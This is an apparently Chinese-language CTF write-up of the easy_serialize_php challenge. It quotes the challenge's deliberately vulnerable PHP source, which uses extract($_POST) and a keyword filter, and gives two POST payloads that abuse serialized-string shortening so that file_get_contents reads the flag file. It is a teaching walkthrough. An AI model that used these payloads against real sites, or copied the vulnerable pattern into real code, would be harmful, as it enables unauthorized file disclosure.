审计练习13——[安洵杯 2019]easy_serialize_php

平台: buuoj.cn
打开靶机得源码



$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo 'source_code';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

这道题与[0CTF 2016]piapiapia有些相似,都是通过不当的处理将自己原来的结构改变而造成的漏洞
分析下代码。
get一个参数f,这个通过f=phpinfo可以打印出phpinfo();
获取到关键信息
在这里插入图片描述
base_encode(d0g3_f1ag.php)=ZDBnM19mMWFnLnBocA==
那么想办法读取这个文件
看最后一部分
审计练习13——[安洵杯 2019]easy_serialize_php_第1张图片
当function的值为show_image时,对$serialize_info反序列化,打印出$userinfo中base解码后的img参数,$serialize_info是经过过滤之后的$_session
在这里插入图片描述
$_session有三个参数user,function,img
在这里插入图片描述
传入的img_path会被sha1加密再base64编码再给$_session[img],没指定的话就直接base_encode(‘guest.img.png’)
审计练习13——[安洵杯 2019]easy_serialize_php_第2张图片
有两种payload
第一种:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

分析一下
指定了各个参数的值,正常的序列化过程为


$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='ZDBnM19mMWFnLnBocA==';
$_SESSION["img"] = base64_encode('guest_img.png');
echo serialize($_SESSION);
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

但由于过滤机制,那么序列化之后
在这里插入图片描述
原先flagflagflagflagflagflag的位置置空,那么序列化就会向后读取24个字符满足序列化格式,

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"ZZ3Vlc3RfaW1nLnBuZw==";}

那么此时反序列之后就变成了
在这里插入图片描述
后面的";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}由于序列化格式已经满足就被忽略了
也就是说我们现在可以操作img修改序列化进程,后面的s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";就可以正常反序列化再由file_get_contents(base64_decode($userinfo['img']))打印出来
审计练习13——[安洵杯 2019]easy_serialize_php_第3张图片
提示在d0g3_fllllllag里, base_encode(/d0g3_fllllllag)=L2QwZzNfZmxsbGxsbGFn修改一下payload即可

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:2:"dd";s:1:"a";}

审计练习13——[安洵杯 2019]easy_serialize_php_第4张图片
第二种payload

_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

正常序列化过程


$_SESSION['flagphp']=';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);
//a:2:{s:7:"flagphp";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

此时flagphp被置空

a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

第一个元素把";s:48:包含起来作为元素名,后面";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}自动忽略,序列化重新排列
在这里插入图片描述
img就可正常打印出来了
审计练习13——[安洵杯 2019]easy_serialize_php_第5张图片
同样修改下base64文件名即可。

你可能感兴趣的:(ctf,代码审计)